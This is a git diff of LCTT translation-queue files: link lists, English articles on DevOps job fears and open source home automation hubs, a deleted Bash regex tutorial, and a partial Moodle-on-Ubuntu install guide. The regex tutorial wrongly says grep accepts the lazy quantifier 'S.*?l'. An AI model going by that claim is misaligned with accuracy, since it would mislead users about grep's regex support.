校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.howtoforge.com
|
||||
[1]:https://updates.duplicati.com/beta/duplicati_2.0.2.1-1_all.deb
|
||||
[2]:https://www.debian.org/releases/stable/
|
||||
[3]:https://www.howtoforge.com/images/personal_backups_with_duplicati/installation-netstat.png
|
||||
[4]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/installation-netstat.png
|
||||
[5]:https://www.howtoforge.com/images/personal_backups_with_duplicati/installation-web.png
|
||||
[6]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/installation-web.png
|
||||
[7]:https://www.howtoforge.com/images/personal_backups_with_duplicati/create-1.png
|
||||
[8]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/create-1.png
|
||||
[9]:https://www.howtoforge.com/images/personal_backups_with_duplicati/create-2.png
|
||||
[10]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/create-2.png
|
||||
[11]:https://www.howtoforge.com/images/personal_backups_with_duplicati/create-3.png
|
||||
[12]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/create-3.png
|
||||
[13]:https://www.howtoforge.com/images/personal_backups_with_duplicati/create-4.png
|
||||
[14]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/create-4.png
|
||||
[15]:https://www.howtoforge.com/images/personal_backups_with_duplicati/create-5.png
|
||||
[16]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/create-5.png
|
||||
[17]:https://www.howtoforge.com/images/personal_backups_with_duplicati/create-6.png
|
||||
[18]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/create-6.png
|
||||
[19]:https://www.howtoforge.com/images/personal_backups_with_duplicati/create-7.png
|
||||
[20]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/create-7.png
|
||||
[21]:https://www.howtoforge.com/images/personal_backups_with_duplicati/create-8.png
|
||||
[22]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/create-8.png
|
||||
[23]:https://www.howtoforge.com/images/personal_backups_with_duplicati/run-1.png
|
||||
[24]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/run-1.png
|
||||
[25]:https://www.howtoforge.com/images/personal_backups_with_duplicati/restore-1.png
|
||||
[26]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/restore-1.png
|
||||
[27]:https://www.howtoforge.com/images/personal_backups_with_duplicati/restore-2.png
|
||||
[28]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/restore-2.png
|
||||
[29]:https://www.howtoforge.com/images/personal_backups_with_duplicati/remote-1.png
|
||||
[30]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/remote-1.png
|
||||
[31]:https://www.howtoforge.com/images/personal_backups_with_duplicati/remote-sshd.png
|
||||
[32]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/remote-sshd.png
|
||||
[33]:https://www.howtoforge.com/cdn-cgi/l/email-protection
|
||||
[34]:https://www.howtoforge.com/images/personal_backups_with_duplicati/remote-sshtun.png
|
||||
[35]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/remote-sshtun.png
|
||||
[36]:https://www.howtoforge.com/images/personal_backups_with_duplicati/db-1.png
|
||||
[37]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/db-1.png
|
||||
[38]:https://www.howtoforge.com/images/personal_backups_with_duplicati/db-2.png
|
||||
[39]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/db-2.png
|
||||
[40]:https://www.howtoforge.com/images/personal_backups_with_duplicati/db-4.png
|
||||
[41]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/db-4.png
|
||||
[42]:https://www.howtoforge.com/images/personal_backups_with_duplicati/db-5.png
|
||||
[43]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/db-5.png
|
||||
[44]:https://www.howtoforge.com/images/personal_backups_with_duplicati/db-6.png
|
||||
[45]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/db-6.png
|
||||
[46]:https://www.howtoforge.com/images/personal_backups_with_duplicati/db-7.png
|
||||
[47]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/db-7.png
|
||||
[48]:https://www.howtoforge.com/images/personal_backups_with_duplicati/db-8.png
|
||||
[49]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/db-8.png
|
58
sources/tech/20171213 Will DevOps steal my job-.md
Normal file
58
sources/tech/20171213 Will DevOps steal my job-.md
Normal file
@ -0,0 +1,58 @@
|
||||
Will DevOps steal my job?
|
||||
======
|
||||
|
||||
>Are you worried automation will replace people in the workplace? You may be right, but here's why that's not a bad thing.
|
||||
|
||||
![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/BIZ_question_B.png?itok=f88cyt00)
|
||||
>Image by : opensource.com
|
||||
|
||||
It's a common fear: Will DevOps be the end of my job? After all, DevOps means developers doing operations, right? DevOps is automation. What if I automate myself out of a job? Do continuous delivery and containers mean operations staff are obsolete? DevOps is all about coding: infrastructure-as-code and testing-as-code and this-or-that-as-code. What if I don't have the skill set to be a part of this?
|
||||
|
||||
[DevOps][1] is a looming change, disruptive in the field, with seemingly fanatical followers talking about changing the world with the [Three Ways][2]--the three underpinnings of DevOps--and the tearing down of walls. It can all be overwhelming. So what's it going to be--is DevOps going to steal my job?
|
||||
|
||||
### The first fear: I'm not needed
|
||||
|
||||
As developers managing the entire lifecycle of an application, it's all too easy to get caught up in the idea of DevOps. Containers are probably a big contributing factor to this line of thought. When containers exploded onto the scene, they were touted as a way for developers to build, test, and deploy their code all-in-one. What role does DevOps leave for the operations team, or testing, or QA?
|
||||
|
||||
This stems from a misunderstanding of the principles of DevOps. The first principle of DevOps, or the First Way, is _Systems Thinking_ , or placing emphasis on a holistic approach to managing and understanding the whole lifecycle of an application or service. This does not mean that the developers of the application learn and manage the whole process. Rather, it is the collaboration of talented and skilled individuals to ensure success as a whole. To make developers solely responsible for the process is practically the extreme opposite of this tenet--essentially the enshrining of a single silo with the importance of the entire lifecycle.
|
||||
|
||||
There is a place for specialization in DevOps. Just as the classically educated software engineer with knowledge of linear regression and binary search is wasted writing Ansible playbooks and Docker files, the highly skilled sysadmin with the knowledge of how to secure a system and optimize database performance is wasted writing CSS and designing user flows. The most effective group to write, test, and maintain an application is a cross-discipline, functional team of people with diverse skill sets and backgrounds.
|
||||
|
||||
### The second fear: My job will be automated
|
||||
|
||||
Accurate or not, DevOps can sometimes be seen as a synonym for automation. What work is left for operations staff and testing teams when automated builds, testing, deployment, monitoring, and notifications are a huge part of the application lifecycle? This focus on automation can be partially related to the Second Way: _Amplify Feedback Loops_. This second tenet of DevOps deals with prioritizing quick feedback between teams in the opposite direction an application takes to deployment --from monitoring and maintaining to deployment, testing, development, etc., and the emphasis to make the feedback important and actionable. While the Second Way is not specifically related to automation, many of the automation tools teams use within their deployment pipelines facilitate quick notification and quick action, or course-correction based on feedback in support of this tenet. Traditionally done by humans, it is easy to understand why a focus on automation might lead to anxiety about the future of one's job.
|
||||
|
||||
Automation is just a tool, not a replacement for people. Smart people trapped doing the same things over and over, pushing the big red George Jetson button are a wasted, untapped wealth of intelligence and creativity. Automation of the drudgery of daily work means more time to spend solving real problems and coming up with creative solutions. Humans are needed to figure out the "how and why;" computers can handle the "copy and paste."
|
||||
|
||||
There will be no end of repetitive, predictable things to automate, and automation frees teams to focus on higher-order tasks in their field. Monitoring teams, no longer spending all their time configuring alerts or managing trending configuration, can start to focus on predicting alarms, correlating statistics, and creating proactive solutions. Systems administrators, freed of scheduled patching or server configuration, can spend time focusing on fleet management, performance, and scaling. Unlike the striking images of factory floors and assembly lines totally devoid of humans, automated tasks in the DevOps world mean humans can focus on creative, rewarding tasks instead of mind-numbing drudgery.
|
||||
|
||||
### The third fear: I do not have the skillset for this
|
||||
|
||||
"How am I going to keep up with this? I don't know how to automate. Everything is code now--do I have to be a developer and write code for a living to work in DevOps?" The third fear is ultimately a fear of self-confidence. As the culture changes, yes, teams will be asked to change along with it, and some may fear they lack the skills to perform what their jobs will become.
|
||||
|
||||
Most folks, however, are probably already closer than they think. What is the Dockerfile, or configuration management like Puppet or Ansible, but environment as code? System administrators already write shell scripts and Python programs to handle repetitive tasks for them. It's hardly a stretch to learn a little more and begin using some of the tools already at their disposal to solve more problems--orchestration, deployment, maintenance-as-code--especially when freed from the drudgery of manual tasks to focus on growth.
|
||||
|
||||
The answer to this fear lies in the third tenet of DevOps, the Third Way: _A Culture of Continual Experimentation and Learning_. The ability to try and fail and learn from mistakes without blame is a major factor in creating ever-more creative solutions. The Third Way is empowered by the first two ways --allowing for quick detection of and repair of problems, and just as the developer is free to try and learn, other teams are as well. Operations teams that have never used configuration management or written programs to automate infrastructure provisioning are free to try and learn. Testing and QA teams are free to implement new testing pipelines and automate approval and release processes. In a culture that embraces learning and growing, everyone has the freedom to acquire the skills they need to succeed at and enjoy their job.
|
||||
|
||||
### Conclusion
|
||||
|
||||
Any disruptive practice or change in an industry can create fear or uncertainty, and DevOps is no exception. A concern for one's job is a reasonable response to the hundreds of articles and presentations enumerating the countless practices and technologies seemingly dedicated to empowering developers to take responsibility for every aspect of the industry.
|
||||
|
||||
In truth, however, DevOps is "[a cross-disciplinary community of practice dedicated to the study of building, evolving, and operating rapidly changing resilient systems at scale][3]." DevOps means the end of silos, but not specialization. It is the delegation of drudgery to automated systems, freeing you to do what people do best: think and imagine. And if you're motivated to learn and grow, there will be no end of opportunities to solve new and challenging problems.
|
||||
|
||||
Will DevOps take away your job? Yes, but it will give you a better one.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://opensource.com/article/17/12/will-devops-steal-my-job
|
||||
|
||||
作者:[Chris Collins][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com/users/clcollins
|
||||
[1]:https://opensource.com/resources/devops
|
||||
[2]:http://itrevolution.com/the-three-ways-principles-underpinning-devops/
|
||||
[3]:https://theagileadmin.com/what-is-devops/
|
118
sources/tech/20171214 6 open source home automation tools.md
Normal file
118
sources/tech/20171214 6 open source home automation tools.md
Normal file
@ -0,0 +1,118 @@
|
||||
6 open source home automation tools
|
||||
======
|
||||
|
||||
![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/osdc_520x292_openlightbulbs.png?itok=nrv9hgnH)
|
||||
|
||||
The [Internet of Things][13] isn't just a buzzword, it's a reality that's expanded rapidly since we last published a review article on home automation tools in 2016. In 2017, [26.5% of U.S. households][14] already had some type of smart home technology in use; within five years that percentage is expected to double.
|
||||
|
||||
With an ever-expanding number of devices available to help you automate, protect, and monitor your home, it has never been easier nor more tempting to try your hand at home automation. Whether you're looking to control your HVAC system remotely, integrate a home theater, protect your home from theft, fire, or other threats, reduce your energy usage, or just control a few lights, there are countless devices available at your disposal.
|
||||
|
||||
But at the same time, many users worry about the security and privacy implications of bringing new devices into their homes—a very real and [serious consideration][15]. They want to control who has access to the vital systems that control their appliances and record every moment of their everyday lives. And understandably so: In an era when even your refrigerator may now be a smart device, don't you want to know if your fridge is phoning home? Wouldn't you want some basic assurance that, even if you give a device permission to communicate externally, it is only accessible to those who are explicitly authorized?
|
||||
|
||||
[Security concerns][16] are among the many reasons why open source will be critical to our future with connected devices. Being able to fully understand the programs that control your home means you can view, and if necessary modify, the source code running on the devices themselves.
|
||||
|
||||
While connected devices often contain proprietary components, a good first step in bringing open source into your home automation system is to ensure that the device that ties your devices together—and presents you with an interface to them (the "hub")—is open source. Fortunately, there are many choices out there, with options to run on everything from your always-on personal computer to a Raspberry Pi.
|
||||
|
||||
Here are just a few of our favorites.
|
||||
|
||||
### Calaos
|
||||
|
||||
[Calaos][17] is designed as a full-stack home automation platform, including a server application, touchscreen interface, web application, native mobile applications for iOS and Android, and a preconfigured Linux operating system to run underneath. The Calaos project emerged from a French company, so its support forums are primarily in French, although most of the instructional material and documentation have been translated into English.
|
||||
|
||||
Calaos is licensed under version 3 of the [GPL][18] and you can view its source on [GitHub][19].
|
||||
|
||||
### Domoticz
|
||||
|
||||
[Domoticz][20] is a home automation system with a pretty wide library of supported devices, ranging from weather stations to smoke detectors to remote controls, and a large number of additional third-party [integrations][21] are documented on the project's website. It is designed with an HTML5 frontend, making it accessible from desktop browsers and most modern smartphones, and is lightweight, running on many low-power devices like the Raspberry Pi.
|
||||
|
||||
Domoticz is written primarily in C/C++ under the [GPLv3][22], and its [source code][23] can be browsed on GitHub.
|
||||
|
||||
### Home Assistant
|
||||
|
||||
[Home Assistant][24] is an open source home automation platform designed to be easily deployed on almost any machine that can run Python 3, from a Raspberry Pi to a network-attached storage (NAS) device, and it even ships with a Docker container to make deploying on other systems a breeze. It integrates with a large number of open source as well as commercial offerings, allowing you to link, for example, IFTTT, weather information, or your Amazon Echo device, to control hardware from locks to lights.
|
||||
|
||||
Home Assistant is released under an [MIT license][25], and its source can be downloaded from [GitHub][26].
|
||||
|
||||
### MisterHouse
|
||||
|
||||
[MisterHouse][27] has gained a lot of ground since 2016, when we mentioned it as "another option to consider" on this list. It uses Perl scripts to monitor anything that can be queried by a computer or control anything capable of being remote controlled. It responds to voice commands, time of day, weather, location, and other events to turn on the lights, wake you up, record your favorite TV show, announce phone callers, warn that your front door is open, report how long your son has been online, tell you if your daughter's car is speeding, and much more. It runs on Linux, macOS, and Windows computers and can read/write from a wide variety of devices including security systems, weather stations, caller ID, routers, vehicle location systems, and more.
|
||||
|
||||
MisterHouse is licensed under the [GPLv2][28] and you can view its source code on [GitHub][29].
|
||||
|
||||
### OpenHAB
|
||||
|
||||
[OpenHAB][30] (short for Open Home Automation Bus) is one of the best-known home automation tools among open source enthusiasts, with a large user community and quite a number of supported devices and integrations. Written in Java, openHAB is portable across most major operating systems and even runs nicely on the Raspberry Pi. Supporting hundreds of devices, openHAB is designed to be device-agnostic while making it easier for developers to add their own devices or plugins to the system. OpenHAB also ships iOS and Android apps for device control, as well as design tools so you can create your own UI for your home system.
|
||||
|
||||
You can find openHAB's [source code][31] on GitHub licensed under the [Eclipse Public License][32].
|
||||
|
||||
### OpenMotics
|
||||
|
||||
[OpenMotics][33] is a home automation system with both hardware and software under open source licenses. It's designed to provide a comprehensive system for controlling devices, rather than stitching together many devices from different providers. Unlike many of the other systems designed primarily for easy retrofitting, OpenMotics focuses on a hardwired solution. For more, see our [full article][34] from OpenMotics backend developer Frederick Ryckbosch.
|
||||
|
||||
The source code for OpenMotics is licensed under the [GPLv2][35] and is available for download on [GitHub][36].
|
||||
|
||||
These aren't the only options available, of course. Many home automation enthusiasts go with a different solution, or even decide to roll their own. Other users choose to use individual smart home devices without integrating them into a single comprehensive system.
|
||||
|
||||
If the solutions above don't meet your needs, here are some potential alternatives to consider:
|
||||
|
||||
* [EventGhost][1] is an open source ([GPL v2][2]) home theater automation tool that operates only on Microsoft Windows PCs. It allows users to control media PCs and attached hardware by using plugins that trigger macros or by writing custom Python scripts.
|
||||
|
||||
* [ioBroker][3] is a JavaScript-based IoT platform that can control lights, locks, thermostats, media, webcams, and more. It will run on any hardware that runs Node.js, including Windows, Linux, and macOS, and is open sourced under the [MIT license][4].
|
||||
|
||||
* [Jeedom][5] is a home automation platform comprised of open source software ([GPL v2][6]) to control lights, locks, media, and more. It includes a mobile app (Android and iOS) and operates on Linux PCs; the company also sells hubs that it says provide a ready-to-use solution for setting up home automation.
|
||||
|
||||
* [LinuxMCE][7] bills itself as the "'digital glue' between your media and all of your electrical appliances." It runs on Linux (including Raspberry Pi), is released under the Pluto open source [license][8], and can be used for home security, telecom (VoIP and voice mail), A/V equipment, home automation, and—uniquely—to play video games.
|
||||
|
||||
* [OpenNetHome][9], like the other solutions in this category, is open source software for controlling lights, alarms, appliances, etc. It's based on Java and Apache Maven, operates on Windows, macOS, and Linux—including Raspberry Pi, and is released under [GPLv3][10].
|
||||
|
||||
* [Smarthomatic][11] is an open source home automation framework that concentrates on hardware devices and software, rather than user interfaces. Licensed under [GPLv3][12], it's used for things such as controlling lights, appliances, and air humidity, measuring ambient temperature, and remembering to water your plants.
|
||||
|
||||
Now it's your turn: Do you already have an open source home automation system in place? Or perhaps you're researching the options to create one. What advice would you have to a newcomer to home automation, and what system or systems would you recommend?
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://opensource.com/life/17/12/home-automation-tools
|
||||
|
||||
作者:[Jason Baker][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com/users/jason-baker
|
||||
[1]:http://www.eventghost.net/
|
||||
[2]:http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
|
||||
[3]:http://iobroker.net/
|
||||
[4]:https://github.com/ioBroker/ioBroker#license
|
||||
[5]:https://www.jeedom.com/site/en/index.html
|
||||
[6]:http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
|
||||
[7]:http://www.linuxmce.com/
|
||||
[8]:http://wiki.linuxmce.org/index.php/License
|
||||
[9]:http://opennethome.org/
|
||||
[10]:https://github.com/NetHome/NetHomeServer/blob/master/LICENSE
|
||||
[11]:https://www.smarthomatic.org/
|
||||
[12]:https://github.com/breaker27/smarthomatic/blob/develop/GPL3.txt
|
||||
[13]:https://opensource.com/resources/internet-of-things
|
||||
[14]:https://www.statista.com/outlook/279/109/smart-home/united-states
|
||||
[15]:http://www.crn.com/slide-shows/internet-of-things/300089496/black-hat-2017-9-iot-security-threats-to-watch.htm
|
||||
[16]:https://opensource.com/business/15/5/why-open-source-means-stronger-security
|
||||
[17]:https://calaos.fr/en/
|
||||
[18]:https://github.com/calaos/calaos-os/blob/master/LICENSE
|
||||
[19]:https://github.com/calaos
|
||||
[20]:https://domoticz.com/
|
||||
[21]:https://www.domoticz.com/wiki/Integrations_and_Protocols
|
||||
[22]:https://github.com/domoticz/domoticz/blob/master/License.txt
|
||||
[23]:https://github.com/domoticz/domoticz
|
||||
[24]:https://home-assistant.io/
|
||||
[25]:https://github.com/home-assistant/home-assistant/blob/dev/LICENSE.md
|
||||
[26]:https://github.com/balloob/home-assistant
|
||||
[27]:http://misterhouse.sourceforge.net/
|
||||
[28]:http://www.gnu.org/licenses/old-licenses/gpl-2.0.en.html
|
||||
[29]:https://github.com/hollie/misterhouse
|
||||
[30]:http://www.openhab.org/
|
||||
[31]:https://github.com/openhab/openhab
|
||||
[32]:https://github.com/openhab/openhab/blob/master/LICENSE.TXT
|
||||
[33]:https://www.openmotics.com/
|
||||
[34]:https://opensource.com/life/14/12/open-source-home-automation-system-opemmotics
|
||||
[35]:http://www.gnu.org/licenses/old-licenses/gpl-2.0.en.html
|
||||
[36]:https://github.com/openmotics
|
@ -1,148 +0,0 @@
|
||||
translating by kimii
|
||||
Bash Scripting: Learn to use REGEX (Basics)
|
||||
======
|
||||
Regular expressions or regex or regexp are basically strings of character that define a search pattern, they can be used for performing 'Search' or 'Search & Replace' operations as well as can be used to validate a condition like password policy etc.
|
||||
|
||||
Regex is a very powerful tool that is available at our disposal & best thing about using regex is that they can be used in almost every computer language. So if you are Bash Scripting or creating a Python program, we can use regex or we can also write a single line search query.
|
||||
|
||||
For this tutorial, we are going to learn some of regex basics concepts & how we can use them in Bash using 'grep', but if you wish to use them on other languages like python or C, you can just use the regex part. So let's start by showing an example for regex,
|
||||
|
||||
**Ex-** A regex looks like
|
||||
|
||||
**/t[aeiou]l/**
|
||||
|
||||
But what does this mean? It means that the mentioned regex is going to look for a word that starts with 't', has any of the letters 'a e i o u' in the middle & the letter 'l' as the last letter. It can be 'tel', 'tal' or 'til'. The match can be a separate word or part of another word like 'tilt', 'brutal' or 'telephone'.
|
||||
|
||||
**Syntax for using regex with grep is**
|
||||
|
||||
**$ grep "regex_search_term" file_location**
|
||||
|
||||
Don't worry if its getting over the mind, this was just an example to show what can be achieved with regex & believe me this was simplest of the example. We can achieve much much more from regex. We will now start regex with basics.
|
||||
|
||||
**(Recommended Read: [Useful Linux Commands that you should know ][1])**
|
||||
|
||||
## **Regex Basics**
|
||||
|
||||
We will now start learning about some special characters that are known as MetaCharacters. They help us in creating more complex regex search term. Mentioned below is the list of basic metacharacters,
|
||||
|
||||
**. or Dot** will match any character
|
||||
|
||||
**[ ]** will match a range of characters
|
||||
|
||||
**[^ ]** will match all characters except for the ones mentioned in braces
|
||||
|
||||
**\*** will match zero or more of the preceding items
|
||||
|
||||
**+** will match one or more of the preceding items
|
||||
|
||||
**? ** will match zero or one of the preceding items
|
||||
|
||||
**{n}** will match 'n' numbers of preceding items
|
||||
|
||||
**{n,}** will match 'n' number of or more of preceding items
|
||||
|
||||
**{n,m}** will match between 'n' & 'm' number of items
|
||||
|
||||
**{ ,m}** will match less than or equal to m number of items
|
||||
|
||||
**\ ** is an escape character, used when we need to include one of the metacharacters in our search.
|
||||
|
||||
We will now discuss all these metacharacters with examples.
|
||||
|
||||
### **. or Dot**
|
||||
|
||||
Its used to match any character that occurs in our search term. For example, we can use dot like
|
||||
|
||||
**$ grep "d.g" file1**
|
||||
|
||||
This regex means we are looking for a word that starts with 'd', ends with 'g' & can have any character in the middle in the file named 'file1'. Similarly we can use the dot character any number of times for our search pattern, like
|
||||
|
||||
**T......h**
|
||||
|
||||
This search term will look for a word that starts with 'T', ends with 'h' & can have any six characters in the middle.
|
||||
|
||||
### **[ ]**
|
||||
|
||||
Square braces are used to define a range of characters. For example, we need to search for some words in particular rather than matching any character,
|
||||
|
||||
**$ grep "N[oen]n" file2**
|
||||
|
||||
here, we are looking for a word that starts with 'N', ends with 'n' & can only have either of 'o' or 'e' or 'n' in the middle . We can mention from a single to any number of characters inside the square braces.
|
||||
|
||||
We can also define ranges like 'a-e' or '1-18' as the list of matching characters inside square braces.
|
||||
|
||||
### **[^ ]**
|
||||
|
||||
This is like the not operator for regex. While using [^ ], it means that our search will include all the characters except the ones mentioned inside the square braces. Example,
|
||||
|
||||
**$ grep "St[^1-9]d" file3**
|
||||
|
||||
This means that we can have all the words that starts with 'St' , ends with letter 'd' & must not contain any number from 1 to 9.
|
||||
|
||||
Now up until now we were only using examples of regex that only need to look for a single character in the middle, but what if we need to look for more than that. Let's say we need to locate all words that start & end with a character & can have any number of characters in the middle. That's where we use multiplier metacharacters i.e. *, + & ?.
|
||||
|
||||
{n}, {n,m}, {n,} or {,m} are also some other multiplier metacharacters that we can use in our regex terms.
|
||||
|
||||
### * (asterisk)
|
||||
|
||||
The following example matches any number of occurrences of the letter k, including none:
|
||||
|
||||
**$ grep "lak*" file4**
|
||||
|
||||
it means we can have a match with 'lake' or 'la' or 'lakkkkk'
|
||||
|
||||
### +
|
||||
|
||||
The following pattern requires that at least one occurrence of the letter k in the string be matched:
|
||||
|
||||
**$ grep "lak+" file5**
|
||||
|
||||
here, k at least should occur once in our search, so our results can be 'lake' or 'lakkkkk' but not 'la'.
|
||||
|
||||
|
||||
### **?**
|
||||
|
||||
In the following pattern matches
|
||||
|
||||
**$ grep "ba?b" file6**
|
||||
|
||||
the string bb or bab as with '?' multiplier we can have one or zero occurrence of the character.
|
||||
|
||||
### **Very important Note:**
|
||||
|
||||
This is pretty important while using multipliers, suppose we have a regex
|
||||
|
||||
**$ grep "S.*l" file7**
|
||||
|
||||
And we get results with 'small', 'silly' & then we also got 'Shane is a little to play ball'. But why did we get 'Shane is a little to play ball'? We were only looking for words in our search, so why did we get the complete sentence as our output?
|
||||
|
||||
That's because it satisfies our search criteria, it starts with letter 'S', has any number of characters in the middle & ends with letter 'l'. So what can we do to correct our regex, so that we only get words instead of whole sentences as our output.
|
||||
|
||||
We need to add the '?' metacharacter in the regex,
|
||||
|
||||
**$ grep "S.*?l" file7**
|
||||
|
||||
This will correct the behavior of our regex.
|
||||
|
||||
### **\ or Escape characters**
|
||||
|
||||
\ is used when we need to include a character that is a metacharacter or has special meaning to regex. For example, we need to locate all the words ending with dot, so we can use
|
||||
|
||||
**$ grep "S.*\\." file8**
|
||||
|
||||
This will search and match all the words that ends with a dot character.
|
||||
|
||||
We now have some basic idea of how regex works with this regex basics tutorial. In our next tutorial, we will learn some advanced concepts of regex. In the meanwhile, practice as much as you can, create regexes and try to incorporate them in your work as much as you can. & if you have any queries or questions you can leave them in the comments below.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: http://linuxtechlab.com/bash-scripting-learn-use-regex-basics/
|
||||
|
||||
作者:[SHUSAIN][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://linuxtechlab.com/author/shsuain/
|
||||
[1]:http://linuxtechlab.com/useful-linux-commands-you-should-know/
|
173
sources/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
Normal file
173
sources/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
Normal file
@ -0,0 +1,173 @@
|
||||
How to Install Moodle on Ubuntu 16.04
|
||||
======
|
||||
![How to Install Moodle on Ubuntu 16.04][1]
|
||||
|
||||
Step-by-step Installation Guide on how to Install Moodle on Ubuntu 16.04. Moodle (an acronym of 'Modular Object-Oriented Dynamic Learning Environment') is a free and open source learning management system built to provide teachers, students and administrators a single personalized learning environment. Moodle is built by the Moodle project, which is led and coordinated by [Moodle HQ][2]
|
||||
|
||||
,
|
||||
|
||||
**Moodle comes with a lot of useful features such as:**
|
||||
|
||||
* Modern and easy to use interface
|
||||
* Personalised Dashboard
|
||||
* Collaborative tools and activities
|
||||
* All-in-one calendar
|
||||
* Simple text editor
|
||||
* Track progress
|
||||
* Notifications
|
||||
* and many more…
|
||||
|
||||
|
||||
|
||||
In this tutorial we will guide you through the steps of installing the latest version of Moodle on an Ubuntu 16.04 VPS with Apache web server, MySQL and PHP 7.
|
||||
|
||||
### 1. Login via SSH
|
||||
|
||||
First of all, login to your Ubuntu 16.04 VPS via SSH as user root
|
||||
|
||||
### 2. Update the OS Packages
|
||||
|
||||
Run the following command to update the OS packages and install some dependencies
|
||||
```
|
||||
apt-get update && apt-get upgrade
|
||||
apt-get install git-core graphviz aspell
|
||||
```
|
||||
|
||||
### 3. Install Apache Web Server
|
||||
|
||||
Install Apache web server from the Ubuntu repository
|
||||
```
|
||||
apt-get install apache2
|
||||
```
|
||||
|
||||
### 4. Start Apache Web Server
|
||||
|
||||
Once it is installed, start Apache and enable it to start automatically upon system boot
|
||||
```
|
||||
systemctl enable apache2
|
||||
```
|
||||
|
||||
### 5. Install PHP 7
|
||||
|
||||
Next, we will install PHP 7 and some additional PHP modules required by Moodle
|
||||
```
|
||||
apt-get install php7.0 libapache2-mod-php7.0 php7.0-pspell php7.0-curl php7.0-gd php7.0-intl php7.0-mysql php7.0-xml php7.0-xmlrpc php7.0-ldap php7.0-zip
|
||||
```
|
||||
|
||||
### 6. Install and Configure MySQL Database Server
|
||||
|
||||
Moodle stores most of its data in a database, so we will install MySQL database server
|
||||
```
|
||||
apt-get install mysql-client mysql-server
|
||||
```
|
||||
|
||||
After the installation, run the `mysql_secure_installation` script to set your MySQL root password and secure your MySQL installation.
|
||||
|
||||
Login to the MySQL server as user root and create a user and database for the Moodle installation
|
||||
```
|
||||
mysql -u root -p
|
||||
mysql> CREATE DATABASE moodle;
|
||||
mysql> GRANT ALL PRIVILEGES ON moodle.* TO 'moodleuser'@'localhost' IDENTIFIED BY 'PASSWORD';
|
||||
mysql> FLUSH PRIVILEGES;
|
||||
mysql> \q
|
||||
```
|
||||
|
||||
Don't forget to replace 'PASSWORD' with an actual strong password.
|
||||
|
||||
### 7. Get Moodle from GitHub repository
|
||||
|
||||
Next, change the current working directory and clone Moodle from their official GitHub repository
|
||||
```
|
||||
cd /var/www/html/
|
||||
git clone https://github.com/moodle/moodle.git
|
||||
```
|
||||
|
||||
Go to the '/moodle' directory and check all available branches
|
||||
```
|
||||
cd moodle/
|
||||
git branch -a
|
||||
```
|
||||
|
||||
Select the latest stable version (currently it is MOODLE_34_STABLE) and run the following command to tell git which branch to track or use
|
||||
```
|
||||
git branch --track MOODLE_34_STABLE origin/MOODLE_34_STABLE
|
||||
```
|
||||
|
||||
and checkout the specified version
|
||||
```
|
||||
git checkout MOODLE_34_STABLE
|
||||
|
||||
Switched to branch 'MOODLE_34_STABLE'
|
||||
Your branch is up-to-date with 'origin/MOODLE_34_STABLE'.
|
||||
```
|
||||
|
||||
Create a directory for the Moodle data
|
||||
```
|
||||
mkdir /var/moodledata
|
||||
```
|
||||
|
||||
Set the correct ownership and permissions
|
||||
```
|
||||
chown -R www-data:www-data /var/www/html/moodle
|
||||
chown www-data:www-data /var/moodledata
|
||||
```
|
||||
|
||||
### 8. Configure Apache Web Server
|
||||
|
||||
Create Apache virtual host for your domain name with the following content
|
||||
```
|
||||
nano /etc/apache2/sites-available/yourdomain.com.conf
|
||||
|
||||
ServerAdmin admin@yourdomain.com
|
||||
DocumentRoot /var/www/html/moodle
|
||||
ServerName yourdomain.com
|
||||
ServerAlias www.yourdomain.com
|
||||
|
||||
Options Indexes FollowSymLinks MultiViews
|
||||
AllowOverride All
|
||||
Order allow,deny
|
||||
allow from all
|
||||
|
||||
ErrorLog /var/log/httpd/yourdomain.com-error_log
|
||||
CustomLog /var/log/httpd/yourdomain.com-access_log common
|
||||
|
||||
```
|
||||
|
